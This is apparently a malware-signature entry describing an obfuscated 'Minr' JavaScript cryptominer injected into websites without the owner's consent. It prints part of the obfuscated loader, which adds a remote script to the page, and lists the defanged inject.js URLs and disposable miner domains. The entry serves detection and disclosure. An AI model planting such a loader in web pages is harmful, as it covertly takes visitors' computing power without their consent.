Description:
Website contains an encrypted "Minr" JavaScript miner, which usually means that it's used without webmaster's consent.
var _0x582d=['c2NyaXB0','c3Jj','aHR0cHM6Ly9ob3N0LmQtbnMuZ2EvaW5...skipped...oZWNrPWZhbHNl','aGVhZA==','YXBwZW5kQ2hpbGQ=','Y3JlYXRlRWxlbWVudA=='];(function(a,d){var b=function(b){while(--b){a['push'](a['shift']());}};var c=function(){var a={'data':{'key':'cookie','value':'timeout'},'setCookie':function(b,h,i,e){e=e||{};var c=h+'='+i;var a=0x0;for(var a=0x0,f=b['length'];a...skipped...
;_0x2ecabc();var el=document[_0xd582('0x0')](_0xd582('0x1'));el[_0xd582('0x2')]=_0xd582('0x3');document[_0xd582('0x4')][_0xd582('0x5')](el);
This code injects a Minr from hxxps://abc.pema.cl/inject.js?key=<key>&throttle=0.15&se_check=false, hxxps://host.d-ns[.]ga/inject.js?key=<key>&throttle=0.5&se_check=false or some other disposable domains like st.kjli[.]fi, host.d-ns[.]ga, abc.pema[.]cl, metrika.ron[.]si minr[.]pw, xy.nullrefexcep[.]com.
Affecting: Any web site (no specific target).